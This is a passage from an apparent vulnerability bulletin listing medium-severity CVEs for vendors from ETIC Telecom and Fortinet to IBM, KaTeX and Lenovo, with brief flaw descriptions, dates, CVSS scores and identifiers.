The Podlove Podcast Publisher plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Feed Name value in version <= 4.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2025-01-18 | 4.4 | CVE-2025-0554 |
| ETIC Telecom--Remote Access Server (RAS) |
All versions of ETIC Telecom Remote Access Server (RAS) prior to 4.5.0 expose clear text credentials in the web portal. An attacker can access the ETIC RAS web portal and view the HTML code, which is configured to be hidden, thus allowing a connection to the ETIC RAS ssh server, which could enable an attacker to perform actions on the device. | 2025-01-17 | 6.8 | CVE-2024-26155 |
| ETIC Telecom--Remote Access Server (RAS) |
All versions of ETIC Telecom Remote Access Server (RAS) prior to 4.5.0 are vulnerable to reflected cross site scripting (XSS) attacks in get view method under view parameter. The ETIC RAS web server uses dynamic pages that get their input from the client side and reflect the input in their response to the client. | 2025-01-17 | 6.1 | CVE-2024-26157 |
| ETIC Telecom--Remote Access Server (RAS) |
All versions of ETIC Telecom Remote Access Server (RAS) prior to 4.5.0 are vulnerable to reflected cross site scripting in the appliance site name. The ETIC RAS web server saves the site name and then presents it to the administrators in a few different pages. | 2025-01-17 | 4.8 | CVE-2024-26154 |
| ETIC Telecom--Remote Access Server (RAS) |
All versions of ETIC Telecom Remote Access Server (RAS) prior to 4.5.0 are vulnerable to reflected cross site scripting (XSS) attacks in the method parameter. The ETIC RAS web server uses dynamic pages that gets their input from the client side and reflects the input in its response to the client. | 2025-01-17 | 4.8 | CVE-2024-26156 |
| Eugenio Petull--imaGenius |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eugenio Petullà imaGenius allows Stored XSS.This issue affects imaGenius: from n/a through 1.7. | 2025-01-16 | 6.5 | CVE-2025-23772 |
| evergreencontentposter--Evergreen Content Poster Auto Post and Schedule Your Best Content to Social Media |
The Evergreen Content Poster - Auto Post and Schedule Your Best Content to Social Media plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_network_post() function in all versions up to, and including, 1.4.4. This makes it possible for unauthenticated attackers to delete arbitrary posts and pages. | 2025-01-18 | 5.3 | CVE-2024-12071 |
| extendthemes--Kubio AI Page Builder |
The Kubio AI Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-01-18 | 6.1 | CVE-2024-13516 |
| Eyouth { rob.panes }--Charity-thermometer |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Eyouth { rob.panes } Charity-thermometer allows Stored XSS.This issue affects Charity-thermometer: from n/a through 1.1.2. | 2025-01-16 | 6.5 | CVE-2025-23860 |
| fahadmahmood--WP Responsive Tabs |
The WP Responsive Tabs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprtabs' shortcode in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-16 | 6.4 | CVE-2024-13387 |
| Faizaan Gagan--Course Migration for LearnDash |
Server-Side Request Forgery (SSRF) vulnerability in Faizaan Gagan Course Migration for LearnDash allows Server Side Request Forgery.This issue affects Course Migration for LearnDash: from 1.0.2 through n/a. | 2025-01-15 | 6.4 | CVE-2025-22346 |
| falldeaf--WP ViewSTL |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in falldeaf WP ViewSTL allows DOM-Based XSS.This issue affects WP ViewSTL: from n/a through 1.0. | 2025-01-15 | 6.5 | CVE-2025-22742 |
| Fanli2012--native-php-cms |
A vulnerability was found in Fanli2012 native-php-cms 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /fladmin/cat_edit.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 6.3 | CVE-2025-0487 |
| Fanli2012--native-php-cms |
A vulnerability classified as critical has been found in Fanli2012 native-php-cms 1.0. This affects an unknown part of the file product_list.php. The manipulation of the argument cat leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 6.3 | CVE-2025-0488 |
| Fanli2012--native-php-cms |
A vulnerability classified as critical was found in Fanli2012 native-php-cms 1.0. This vulnerability affects unknown code of the file /fladmin/friendlink_dodel.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 6.3 | CVE-2025-0489 |
| Fanli2012--native-php-cms |
A vulnerability, which was classified as critical, has been found in Fanli2012 native-php-cms 1.0. This issue affects some unknown processing of the file /fladmin/article_dodel.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 6.3 | CVE-2025-0490 |
| Fanli2012--native-php-cms |
A vulnerability, which was classified as critical, was found in Fanli2012 native-php-cms 1.0. Affected is an unknown function of the file /fladmin/cat_dodel.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-01-15 | 6.3 | CVE-2025-0491 |
| fortinet -- fortios |
A null pointer dereference in FortiOS versions 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0 all versions, 6.4 all versions , 6.2 all versions and 6.0 all versions allows attacker to trigger a denial of service via a crafted http request. | 2025-01-14 | 6.5 | CVE-2023-42785 |
| fortinet -- fortios |
A null pointer dereference in FortiOS versions 7.4.0 through 7.4.1, 7.2.0 through 7.2.5, 7.0 all versions, 6.4 all versions , 6.2 all versions and 6.0 all versions allows attacker to trigger a denial of service via a crafted http request. | 2025-01-14 | 6.5 | CVE-2023-42786 |
| Fortinet--FortiAnalyzer |
A stack-based buffer overflow in Fortinet FortiAnalyzer versions 7.4.0 through 7.4.3, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, FortiManager versions 7.4.0 through 7.4.3, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, FortiManager Cloud versions 7.4.1 through 7.4.3, 7.2.1 through 7.2.5, 7.0.1 through 7.0.11, 6.4.1 through 6.4.7, FortiAnalyzer Cloud versions 7.4.1 through 7.4.3, 7.2.1 through 7.2.5, 7.0.1 through 7.0.11, 6.4.1 through 6.4.7 allows attacker to execute unauthorized code or commands via specially crafted packets. | 2025-01-14 | 5.6 | CVE-2024-35276 |
| Fortinet--FortiAP-S |
A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiAP-S 6.2 all verisons, and 6.4.0 through 6.4.9, FortiAP-W2 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.3, and 7.4.0 through 7.4.2, FortiAP 6.4 all versions, 7.0 all versions, 7.2.0 through 7.2.3, and 7.4.0 through 7.4.2 allow a local authenticated attacker to execute unauthorized code via the CLI. | 2025-01-14 | 6.7 | CVE-2024-26012 |
| Fortinet--FortiClientEMS |
An observable response discrepancy vulnerability [CWE-204] in FortiClientEMS 7.4.0, 7.2.0 through 7.2.4, 7.0 all versions, and FortiSOAR 7.5.0, 7.4.0 through 7.4.4, 7.3.0 through 7.3.2, 7.2 all versions, 7.0 all versions, 6.4 all versions may allow an unauthenticated attacker to enumerate valid users via observing login request responses. | 2025-01-14 | 5.3 | CVE-2024-36510 |
| Fortinet--FortiDeceptor |
A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiDeceptor 3.x all versions, 4.x all versions, 5.0 all versions, 5.1 all versions, version 5.2.0, and version 5.3.0 may allow an attacker to perform a reflected cross-site scripting attack in the recovery endpoints | 2025-01-15 | 5.4 | CVE-2024-35280 |
| Fortinet--FortiDeceptor |
An Improper Access Control vulnerability [CWE-284] in FortiDeceptor version 6.0.0, version 5.3.3 and below, version 5.2.1 and below, version 5.1.0, version 5.0.0 may allow an authenticated attacker with none privileges to perform operations on the central management appliance via crafted requests. | 2025-01-14 | 4.3 | CVE-2024-45326 |
| Fortinet--FortiMail |
An improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiMail versions 7.2.0 through 7.2.4 and 7.0.0 through 7.0.6 and 6.4.0 through 6.4.7, FortiRecorder versions 7.0.0 and 6.4.0 through 6.4.4 allows attacker to execute unauthorized code or commands via the CLI. | 2025-01-14 | 6.7 | CVE-2024-56497 |
| Fortinet--FortiManager |
An improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiManager, FortiAnalyzer versions 7.4.0 through 7.4.2 and 7.2.0 through 7.2.5 and 7.0.0 through 7.0.12 and 6.4.0 through 6.4.14 and 6.2.0 through 6.2.12 and 6.0.0 through 6.0.12 allows attacker to execute unauthorized code or commands via crafted HTTP or HTTPs requests. | 2025-01-14 | 6.5 | CVE-2024-33502 |
| Fortinet--FortiManager |
A improper privilege management in Fortinet FortiManager version 7.4.0 through 7.4.3, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14, FortiAnalyzer version 7.4.0 through 7.4.2, 7.2.0 through 7.2.5, 7.0.0 through 7.0.12, 6.4.0 through 6.4.14 allows attacker to escalation of privilege via specific shell commands | 2025-01-14 | 6.7 | CVE-2024-33503 |
| Fortinet--FortiManager |
A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiAnalyzer version 7.4.0 through 7.4.2, FortiManager version 7.4.0 through 7.4.2 allows attacker to escalation of privilege via specially crafted http requests. | 2025-01-14 | 6.6 | CVE-2024-35275 |
| Fortinet--FortiManager |
A relative path traversal vulnerability [CWE-23] in Fortinet FortiManager version 7.4.0 through 7.4.2 and before 7.2.5 allows a privileged attacker to delete files from the underlying filesystem via crafted HTTP or HTTPs requests. | 2025-01-14 | 5.5 | CVE-2024-32115 |
| Fortinet--FortiOS |
An out-of-bounds read vulnerability [CWE-125] in FortiOS SSLVPN web portal versions 7.4.0 through 7.4.4, versions 7.2.0 through 7.2.8, 7.0 all verisons, and 6.4 all versions may allow an authenticated attacker to perform a denial of service on the SSLVPN web portal via a specially crafted URL. | 2025-01-14 | 6.5 | CVE-2024-36504 |
| Fortinet--FortiOS |
An improper neutralization of crlf sequences in http headers ('http response splitting') in Fortinet FortiOS 7.2.0 through 7.6.0, FortiProxy 7.2.0 through 7.4.5 allows attacker to execute unauthorized code or commands via crafted HTTP header. | 2025-01-14 | 6.5 | CVE-2024-54021 |
| Fortinet--FortiOS |
An allocation of resources without limits or throttling [CWE-770] vulnerability in FortiOS versions 7.6.0, versions 7.4.4 through 7.4.0, 7.2 all versions, 7.0 all versions, 6.4 all versions may allow a remote unauthenticated attacker to prevent access to the GUI via specially crafted requests directed at specific endpoints. | 2025-01-14 | 5.3 | CVE-2024-46666 |
| Fortinet--FortiPortal |
A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiPortal versions 7.2.4 through 7.2.0 and 7.0.0 through 7.2.8 may allow an authenticated attacker to view the SQL query being run server-side when submitting an HTTP request, via including special elements in said request. | 2025-01-14 | 4.3 | CVE-2024-35278 |
| Fortinet--FortiProxy |
An origin validation error [CWE-346] vulnerability in Fortinet FortiOS IPSec VPN version 7.4.0 through 7.4.1 and version 7.2.6 and below allows an authenticated IPSec VPN user with dynamic IP addressing to send (but not receive) packets spoofing the IP of another user via crafted network packets. | 2025-01-14 | 5 | CVE-2023-46715 |
| Fortinet--FortiRecorder |
A relative path traversal in Fortinet FortiRecorder [CWE-23] version 7.2.0 through 7.2.1 and before 7.0.4 allows a privileged attacker to read files from the underlying filesystem via crafted HTTP or HTTPs requests. | 2025-01-14 | 5.5 | CVE-2024-46664 |
| Fortinet--FortiRecorder |
A improper limitation of a pathname to a restricted directory ('path traversal') [CWE-23] in Fortinet FortiRecorder version 7.2.0 through 7.2.1 and before 7.0.4 allows a privileged attacker to delete files from the underlying filesystem via crafted CLI requests. | 2025-01-14 | 5.1 | CVE-2024-47566 |
| Fortinet--FortiRecorder |
A improper limitation of a pathname to a restricted directory ('path traversal') in Fortinet FortiRecorder versions 7.2.0 through 7.2.1, 7.0.0 through 7.0.4, FortiWeb versions 7.6.0, 7.4.0 through 7.4.4, 7.2.0 through 7.2.10, 7.0.0 through 7.0.10, 6.4.0 through 6.4.3, FortiVoice versions 7.0.0 through 7.0.4, 6.4.0 through 6.4.9, 6.0.0 through 6.0.12 allows attacker to escalate privilege via specially crafted packets. | 2025-01-16 | 5.3 | CVE-2024-48885 |
| Fortinet--FortiSIEM |
An Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability [CWE-89] in FortiSIEM ersion 7.1.7 and below, version 7.1.0, version 7.0.3 and below, version 6.7.9 and below, 6.7.8, version 6.6.5 and below, version 6.5.3 and below, version 6.4.4 and below Update/Create Case feature may allow an authenticated attacker to extract database information via crafted requests. | 2025-01-14 | 4.1 | CVE-2024-52969 |
| Fortinet--FortiSOAR |
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in FortiSOAR IMAP connector version 3.5.7 and below may allow an authenticated attacker to execute unauthorized code or commands via a specifically crafted playbook | 2025-01-14 | 6.6 | CVE-2024-48890 |
| Fortinet--FortiSOAR |
An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiSOAR 7.3.0 through 7.3.3, 7.2.1 through 7.2.2 may allow an authenticated attacker to perform a stored cross site scripting (XSS) attack via the creation of malicious playbook. | 2025-01-14 | 6.8 | CVE-2024-48893 |
| Fortinet--FortiVoice |
An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiVoice version 7.0.0 through 7.0.4 and before 6.4.9 allows an authenticated privileged attacker to execute unauthorized code or commands via crafted CLI requests. | 2025-01-14 | 6.7 | CVE-2024-40587 |
| Fortinet--FortiWeb |
A stack-based buffer overflow in Fortinet FortiWeb versions 7.2.0 through 7.2.7, and 7.4.0 through 7.4.1 may allow a privileged user to execute arbitrary code via specially crafted CLI commands, provided the user is able to evade FortiWeb stack protections. | 2025-01-14 | 6.4 | CVE-2024-21758 |
| Fortra--Fortra Application Hub |
Under certain log settings the IAM or CORE service will log credentials in the iam logfile in Fortra Application Hub (Formerly named Helpsystems One) prior to version 1.3 | 2025-01-18 | 5.5 | CVE-2024-11923 |
| glofoxwebdev--Glofox Shortcodes |
The Glofox Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glofox' and 'glofox_lead_capture ' shortcodes in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-17 | 6.4 | CVE-2024-12508 |
| Gold Plugins--Easy FAQs |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gold Plugins Easy FAQs allows Stored XSS.This issue affects Easy FAQs: from n/a through 3.2.1. | 2025-01-16 | 6.5 | CVE-2025-23795 |
| Goldstar--Goldstar |
Missing Authorization vulnerability in Goldstar Goldstar allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Goldstar: from n/a through 2.1.1. | 2025-01-16 | 4.3 | CVE-2025-23962 |
| Google--Chrome |
Inappropriate implementation in Navigation in Google Chrome on Android prior to 132.0.6834.83 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2025-01-15 | 6.5 | CVE-2025-0435 |
| Google--Chrome |
Race in Frames in Google Chrome prior to 132.0.6834.83 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2025-01-15 | 6.5 | CVE-2025-0439 |
| Google--Chrome |
Inappropriate implementation in Fullscreen in Google Chrome on Windows prior to 132.0.6834.83 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2025-01-15 | 6.5 | CVE-2025-0440 |
| Google--Chrome |
Inappropriate implementation in Fenced Frames in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to obtain potentially sensitive information from the system via a crafted HTML page. (Chromium security severity: Medium) | 2025-01-15 | 6.5 | CVE-2025-0441 |
| Google--Chrome |
Inappropriate implementation in Payments in Google Chrome prior to 132.0.6834.83 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2025-01-15 | 6.5 | CVE-2025-0442 |
| Google--Chrome |
Inappropriate implementation in Extensions in Google Chrome prior to 132.0.6834.83 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted Chrome Extension. (Chromium security severity: Low) | 2025-01-15 | 4.3 | CVE-2025-0446 |
| Google--Chrome |
Inappropriate implementation in Compositing in Google Chrome prior to 132.0.6834.83 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2025-01-15 | 4.3 | CVE-2025-0448 |
| gpriday--Page Builder by SiteOrigin |
The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the row label parameter in all versions up to, and including, 2.31.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-14 | 6.4 | CVE-2024-12240 |
| Gravity Forms--Gravity Forms |
The Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style_settings' parameter in versions 2.9.0.1 up to, and including, 2.9.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The attack is only successful in the Chrome web browser, and requires directly browsing the media file via the attachment post. | 2025-01-17 | 5.4 | CVE-2024-13378 |
| gwendydd--Chamber Dashboard Business Directory |
The Chamber Dashboard Business Directory plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'business_categories' shortcode in all versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-16 | 6.4 | CVE-2024-11452 |
| Harun R. Rayhan (Cr@zy Coder)--CC Circle Progress Bar |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Harun R. Rayhan (Cr@zy Coder) CC Circle Progress Bar allows Stored XSS.This issue affects CC Circle Progress Bar: from n/a through 1.0.0. | 2025-01-16 | 6.5 | CVE-2025-23936 |
| HireHive--HireHive Job Plugin |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HireHive HireHive Job Plugin allows Stored XSS.This issue affects HireHive Job Plugin: from n/a through 2.9.0. | 2025-01-15 | 6.5 | CVE-2025-22746 |
| hirewebxperts -- passwords_manager |
The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix value in several AJAX actions in all versions up to, and including, 1.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-01-16 | 6.5 | CVE-2024-12615 |
| Hyland--Alfresco Community Edition |
A vulnerability classified as problematic has been found in Hyland Alfresco Community Edition and Alfresco Enterprise Edition up to 6.2.2. This affects an unknown part of the file /share/s/ of the component URL Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 7.0 is able to address this issue. It is recommended to upgrade the affected component. | 2025-01-18 | 4.3 | CVE-2025-0557 |
| IBM--App Connect Enterprise |
IBM App Connect Enterprise 12.0.1.0 through 12.0.7.0and 13.0.1.0 under certain configurations could allow a privileged user to obtain JMS credentials. | 2025-01-18 | 4.4 | CVE-2024-49338 |
| IBM--Concert Software |
IBM Concert 1.0.0, 1.0.1, and 1.0.2 is vulnerable to sensitive information disclosure through specially crafted API Calls. | 2025-01-18 | 5.3 | CVE-2024-49354 |
| IBM--InfoSphere Information Server |
IBM InfoSphere Information Server 11.7 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. | 2025-01-17 | 6.5 | CVE-2024-52363 |
| IBM--Jazz for Service Management |
IBM Jazz for Service Management 1.1.3 through 1.1.3.22 could allow a remote attacker to obtain sensitive information from improper access restrictions that could aid in further attacks against the system. | 2025-01-18 | 5.3 | CVE-2024-47106 |
| IBM--Maximo Asset Management |
IBM Maximo MXAPIASSET API 7.6.1.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. | 2025-01-19 | 6.5 | CVE-2024-45652 |
| IBM--MQ |
IBM MQ 9.3 LTS, 9.3 CD, 9.4 LTS, and 9.4 CD web console could allow a local user to obtain sensitive information when a detailed technical error message is returned. | 2025-01-14 | 6.2 | CVE-2024-52898 |
| IBM--QRadar WinCollect Agent |
IBM QRadar WinCollect Agent 10.0.0 through 10.1.12 could allow a remote attacker to inject XML data into parameter values due to improper input validation of assumed immutable data. | 2025-01-17 | 4 | CVE-2024-51462 |
| IBM--Robotic Process Automation |
IBM Robotic Process Automation 21.0.0 through 21.0.7.18 and 23.0.0 through 23.0.18 and IBM Robotic Process Automation for Cloud Pak 21.0.0 through 21.0.7.18 and 23.0.0 through 23.0.18 could allow an authenticated user to perform unauthorized actions as a privileged user due to improper validation of client-side security enforcement. | 2025-01-18 | 6.5 | CVE-2024-49824 |
| IBM--Robotic Process Automation |
IBM Robotic Process Automation 21.0.0 through 21.0.7.17 and 23.0.0 through 23.0.18 could allow a local user to escalate their privileges. All files in the install inherit the file permissions of the parent directory and therefore a non-privileged user can substitute any executable for the nssm.exe service. A subsequent service or server restart will then run that binary with administrator privilege. | 2025-01-18 | 6.7 | CVE-2024-51448 |
| IBM--Security ReaQta |
IBM Security ReaQta 3.12 could allow an authenticated user to perform unauthorized actions due to reliance on untrusted inputs. | 2025-01-19 | 4.3 | CVE-2024-45654 |
| IBM--Sterling Connect:Direct Web Services |
IBM Sterling Connect:Direct Web Services 6.0, 6.1, 6.2, and 6.3 could disclose sensitive IP address information to authenticated users in responses that could be used in further attacks against the system. | 2025-01-19 | 4.3 | CVE-2024-45653 |
| IETF--IPv6 |
IPv4-in-IPv6 and IPv6-in-IPv6 tunneling (RFC 2473) do not require the validation or verification of the source of a network packet, allowing an attacker to spoof and route arbitrary traffic via an exposed network interface. This is a similar issue to CVE-2020-10136. | 2025-01-14 | 5.4 | CVE-2025-23018 |
| IETF--IPv6 |
IPv6-in-IPv4 tunneling (RFC 4213) allows an attacker to spoof and route traffic via an exposed network interface. | 2025-01-14 | 5.4 | CVE-2025-23019 |
| Imagination Technologies--Graphics DDK |
Kernel software installed and running inside a Guest VM may exploit memory shared with the GPU Firmware to write data outside the Guest's virtualised GPU memory. | 2025-01-13 | 6.7 | CVE-2024-52937 |
| Imagination Technologies--Graphics DDK |
Kernel software installed and running inside a Guest VM may exploit memory shared with the GPU Firmware to write data outside the Guest's virtualised GPU memory. | 2025-01-13 | 4.1 | CVE-2024-52935 |
| imithemes--Eventer - WordPress Event & Booking Manager Plugin |
The Eventer plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 3.9.7 via the eventer_woo_download_tickets() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-01-17 | 6.5 | CVE-2024-10799 |
| Infomaniak Staff--VOD Infomaniak |
Missing Authorization vulnerability in Infomaniak Staff VOD Infomaniak allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VOD Infomaniak: from n/a through 1.5.9. | 2025-01-15 | 4.3 | CVE-2025-22729 |
| iTechArt-Group--PayPal Marketing Solutions |
Missing Authorization vulnerability in iTechArt-Group PayPal Marketing Solutions allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PayPal Marketing Solutions: from n/a through 1.2. | 2025-01-16 | 4.3 | CVE-2025-23930 |
| itsourcecode--Farm Management System |
A vulnerability has been found in itsourcecode Farm Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /add-pig.php. The manipulation of the argument pigno leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-19 | 6.3 | CVE-2025-0561 |
| itsourcecode--Tailoring Management System |
A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /expadd.php. The manipulation of the argument expcat leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-01-17 | 6.3 | CVE-2025-0540 |
| Ivo Brett ApplyMetrics--Apply with LinkedIn buttons |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ivo Brett - ApplyMetrics Apply with LinkedIn buttons allows DOM-Based XSS.This issue affects Apply with LinkedIn buttons: from n/a through 2.3. | 2025-01-16 | 6.5 | CVE-2025-23897 |
| Jens Remus--WP krpano |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jens Remus WP krpano allows Stored XSS.This issue affects WP krpano: from n/a through 1.2.1. | 2025-01-16 | 6.5 | CVE-2025-23876 |
| Jimmy Hu--Spiderpowa Embed PDF |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jimmy Hu Spiderpowa Embed PDF allows Stored XSS.This issue affects Spiderpowa Embed PDF: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23807 |
| Jimmy Pea--Feedburner Optin Form |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jimmy Peña Feedburner Optin Form allows Stored XSS.This issue affects Feedburner Optin Form: from n/a through 0.2.8. | 2025-01-16 | 6.5 | CVE-2025-23925 |
| Jobair--JB Horizontal Scroller News Ticker |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jobair JB Horizontal Scroller News Ticker allows DOM-Based XSS.This issue affects JB Horizontal Scroller News Ticker: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23830 |
| Joshua Wieczorek--Daily Proverb |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Joshua Wieczorek Daily Proverb allows Stored XSS.This issue affects Daily Proverb: from n/a through 2.0.3. | 2025-01-16 | 6.5 | CVE-2025-23859 |
| Jrmy Heleine--WP Photo Sphere |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jérémy Heleine WP Photo Sphere allows Stored XSS.This issue affects WP Photo Sphere: from n/a through 3.8. | 2025-01-16 | 6.5 | CVE-2025-23924 |
| jsmoriss--JSM Screenshot Machine Shortcode |
The JSM Screenshot Machine Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ssm' shortcode in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-18 | 6.4 | CVE-2024-13385 |
| Justin Kuepper--QuoteMedia Tools |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Justin Kuepper QuoteMedia Tools allows DOM-Based XSS.This issue affects QuoteMedia Tools: from n/a through 1.0. | 2025-01-16 | 6.5 | CVE-2025-23644 |
| KaTeX--KaTeX |
KaTeX is a fast, easy-to-use JavaScript library for TeX math rendering on the web. KaTeX users who render untrusted mathematical expressions with `renderToString` could encounter malicious input using `\htmlData` that runs arbitrary JavaScript, or generate invalid HTML. Users are advised to upgrade to KaTeX v0.16.21 to remove this vulnerability. Users unable to upgrade should avoid use of or turn off the `trust` option, or set it to forbid `\htmlData` commands, forbid inputs containing the substring `"\\htmlData"` and sanitize HTML output from KaTeX. | 2025-01-17 | 6.3 | CVE-2025-23207 |
| katsushi-kawamori--Moving Users |
The Moving Users plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.05 via the export functionality. The JSON files are stored in predictable locations with guessable file names when exporting user data. This could allow unauthenticated attackers to extract sensitive user data, for instance, email addresses, hashed passwords, and IP addresses. | 2025-01-17 | 5.3 | CVE-2024-12637 |
| kevonadonis--WP Abstracts |
The WP Abstracts plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.2. This is due to missing nonce validation on the wpabstracts_load_status() and wpabstracts_delete_abstracts() functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-01-18 | 6.1 | CVE-2024-12385 |
| Kopatheme--Kopa Nictitate Toolkit |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kopatheme Kopa Nictitate Toolkit allows Stored XSS.This issue affects Kopa Nictitate Toolkit: from n/a through 1.0.2. | 2025-01-16 | 6.5 | CVE-2025-23965 |
| le Pixel Solitaire--Enhanced YouTube Shortcode |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in le Pixel Solitaire Enhanced YouTube Shortcode allows Stored XSS.This issue affects Enhanced YouTube Shortcode: from n/a through 2.0.1. | 2025-01-16 | 6.5 | CVE-2025-23946 |
| Lenovo--PC Manager |
A potential TOCTOU vulnerability was reported in PC Manager, Lenovo Browser, and Lenovo App Store that could allow a local attacker to cause a system crash. | 2025-01-14 | 4.7 | CVE-2024-10253 |
| Lenovo--PC Manager |
A potential buffer overflow vulnerability was reported in PC Manager, Lenovo Browser, and Lenovo App Store that could allow a local attacker to cause a system crash. | 2025-01-14 | 4.7 | CVE-2024-10254 |
| Lenovo--XClarity Administrator |
